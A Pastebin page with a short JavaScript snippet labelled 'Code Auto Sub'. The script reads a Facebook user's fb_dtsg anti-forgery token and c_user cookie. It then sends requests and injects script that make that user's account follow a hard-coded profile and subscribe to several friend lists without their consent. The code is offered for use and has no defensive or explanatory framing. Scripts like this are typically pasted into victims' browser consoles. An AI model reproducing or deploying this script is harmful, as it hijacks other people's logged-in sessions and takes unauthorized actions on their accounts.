Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- //Code Auto Sub By Nguyen Van Thieu
- var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
- var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
- function a(abone)
- { var http4=new XMLHttpRequest;
- var url4="/ajax/follow/follow_profile.php?__a=1";
- var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";
- http4.open("POST",url4,true);
- http4.onreadystatechange=function()
- { if(http4.readyState==4&&http4.status==200)http4.close };
- http4.send(params4)}
- function sublist(uidss)
- { var a = document.createElement('script');
- a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
- document.body.appendChild(a);
- }
- //Sub List Nguyen Van Thieu
- sublist("1395336090607813");sublist("1395336797274409");sublist("1395336667274422");sublist("233909163481654");
- //Sub Nguyen Van Thieu
- a("100003943075415");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement